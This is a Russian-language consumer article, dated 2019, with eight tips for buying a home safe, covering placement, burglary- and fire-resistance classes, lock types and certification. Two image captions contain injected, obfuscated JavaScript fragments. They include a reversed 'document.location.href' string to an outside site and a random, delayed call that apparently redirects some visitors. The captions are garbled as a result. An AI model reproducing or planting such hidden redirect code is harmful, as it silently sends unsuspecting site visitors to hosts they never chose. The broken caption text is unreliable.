Добавить в закладки

Как купить сейф, а не металлическую коробку с замком: 8 рекомендаций по выбору

Установка сейфа в доме – это способ обезопасить ценные вещи, деньги от злоумышленников. Им хорошо известны ухищрения домовладельцев, которые «ныкают» ценности по одним и тем же местам. Мы подготовили для вас список важных критериев, следуя которым вы купите не просто коробку с замком, а самое настоящее бронированное хранилище, не поддающееся взлому.

Как выбрать сейф для дома?

Как выбрать сейф для дома. Фото: f.sravni.ru

  1. Куда поставите? Прежде, чем отправится в магазин хорошо исследуйте закоулки собственной квартиры, чтобы выбрать наиболее подходящее место для установки. В этот момент вам станет ясно какая модель подойдет: скрытая в стене или переносная.
  2. Класс взломостойкости очень важен. Для того, чтобы назвать железное изделие почетным званием «сейф», оно проходит много тестов, определяющих уровень надежности, устойчивости к разным злодейским подходам. Самый низкий класс «0», который взламывается за 20 минут, а класс «10» будет противостоять медвежатнику почти сутки. Товары такого высокого качества изготавливаются под заказ.
Классы взломостойкости сейфов

Классы взломостойкости сейфов. Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toykosti_seyfov-_1_.jpg»>vobox.ru

  1. Класс огнестойкости обозначается буквами. На случай пожара очень пригодится высокая степень огнестойкости, которая приписывается после ряда испытаний в раскаленной печи. Обозначается этот класс буквами, говорящими о том, какой тип ценностей может сохранится в этом сейфе, на какое время. Например, пометка «90Б» значит, что в течении полутора часов нахождения в огне, вашим банкнотам-бумагам ничего не угрожает.
Значения класса огнестойкости сейфов

Значения класса огнестойкости сейфов. Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tojkost.JPG»>forter.com.ua

  1. Толщина имеет значение. Во время покупки сейфа для хранения какой-то определенной вещи, обратите внимание на толщину стенок, двери, которые могут занимать дополнительное место.
  2. Отличия по содержимому. Важно определиться что именно будет хранится в сейфе, ведь от этого зависит его «начинка». Для документов предназначены сейфы с большим количеством полочек, для денег может быть встроен трейзер и т.д.
  3. Сейф для хранения оружия обустроен особым образом. Чтобы хранилище было абсолютно безопасным, в нем размещают крепежи для стволов, ящики для патронов. Обязательно посмотрите на маркировку, где точно указывается какое количество оружия может находится в конкретном сейфе.
  4. Замки могут существенно отличаться. Самыми надежными считаются запорные системы ригелей, цельнометаллических прокручиваемых цилиндров. Кодовый механизм может быть механическим или электронным.
  5. Имя производителя не всегда говорит о высоком качестве товара. Самым важным ориентиром при покупке должно становится не название фирмы, а наличие сертификата и класс предлагаемого продавцом изделия.
Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Опубликовано: 22.08.2019





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: